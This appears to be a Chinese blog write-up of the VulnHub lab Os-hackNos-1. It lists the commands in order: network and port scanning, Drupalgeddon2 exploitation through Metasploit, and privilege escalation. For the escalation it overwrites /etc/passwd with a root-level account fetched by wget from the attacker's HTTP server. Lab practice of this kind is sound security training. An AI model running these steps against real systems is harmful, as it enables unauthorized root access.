vulnhub之Os-hackNos-1的实践

  • A+
所属分类:安全文章

好久没做攻防的实践了,本周开始回归,本周末实践的是vulnhub的Os-hackNos-1镜像,下载地址,https://download.vulnhub.com/hacknos/Os-hackNos-1.ova,虽然能用workstation不开,但是扫描不到地址,应该是网络名字又不对了,只能用virtuabox再重新导入,再次地址扫描就有了,

sudo netdiscover -r 192.168.1.0/24,

vulnhub之Os-hackNos-1的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.103,

vulnhub之Os-hackNos-1的实践

有http服务,那就再接着来个目录爆破,sudo dirb http://192.168.1.103,

vulnhub之Os-hackNos-1的实践

看到drupal就好办了,这货很大概率有RCE漏洞,

直接搜吧利用方法吧,searchsploit drupal | grep Metasploit,

vulnhub之Os-hackNos-1的实践

感觉Drupalgeddon2就像,直接在metasploit里搜模块,

search Drupalgeddon2,使用很简单,

use exploit/unix/webapp/drupal_drupalgeddon2,
show options,
set RHOSTS 192.168.1.103,
set TARGETURI /drupal,

vulnhub之Os-hackNos-1的实践

执行还真就拿到shell了,但不是root,需要提权,

vulnhub之Os-hackNos-1的实践

先转成交互式shell,python没有就改python3,

python3 -c 'import pty; pty.spawn("/bin/bash")',

看看哪些命令是root权限的,find / -perm -u=s -type f 2>/dev/null,

vulnhub之Os-hackNos-1的实践

有sudo,有wget,这就好办了,

把/etc/passwd文件内容拷贝到攻击机kali上,

往里面添加hacker/password,

perl -le 'print crypt("password","salt")',

echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,

再开个http下载服务,sudo python -m SimpleHTTPServer 80,

vulnhub之Os-hackNos-1的实践

回到靶机shell上,下载passwd文件覆盖本地/etc/passwd,

wget http://192.168.1.106/passwd -O /etc/passwd,

再su hacker,id一看,打完收工,

vulnhub之Os-hackNos-1的实践


本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Os-hackNos-1的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: